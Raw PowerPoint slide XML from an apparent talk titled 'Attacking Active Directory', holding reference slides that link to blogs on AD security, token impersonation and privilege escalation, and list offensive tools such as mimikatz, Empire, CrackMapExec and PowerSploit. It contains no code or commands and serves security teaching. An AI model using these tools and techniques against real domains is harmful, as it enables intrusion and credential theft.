          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21426099">
            <a:off x="10385289" y="1942102"/>
            <a:ext cx="1299602" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DC’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279511067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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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References!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276628" y="1666254"/>
            <a:ext cx="11290177" cy="2616101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Command and General Infosec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://rmusser.net/docs/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/rmusser01/Infosec_Reference/tree/master/Draft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>All things AD Security w/Emphasis on protection and detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://adsecurity.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{630F3903-C020-482F-87A1-E5B0BD0D61A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="3988004"/>
            <a:ext cx="11723114" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Powershell, AD, Random</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://blog.harmj0y.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.labofapenetrationtester.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.christophertruncer.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://wald0.com/?p=112</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://blog.cptjesus.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/archive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>http://www.exploit-monday.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400686812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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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References!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="1929142"/>
            <a:ext cx="11723114" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tokens and ACL stuffs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://secureidentity.se/acl-dacl-sacl-and-the-ace/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blogs.technet.microsoft.com/askds/2017/04/05/using-debugging-tools-to-find-token-and-session-leaks/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?page_id=1821</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.itprotoday.com/security/understanding-process-tokens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/amp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.blackhat.com/docs/eu-17/materials/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://foxglovesecurity.com/2016/01/16/hot-potato/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326847718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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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References!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234441" y="1929142"/>
            <a:ext cx="11723114" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/EmpireProject/Empire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/BloodHoundAD/BloodHound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://github.com/byt3bl33d3r/CrackMapExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.metasploit.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powerview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://github.com/danielbohannon/Invoke-CradleCrafter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://live.sysinternals.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://github.com/gentilkiwi/mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://github.com/leechristensen/UnmanagedPowerShell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222671167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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
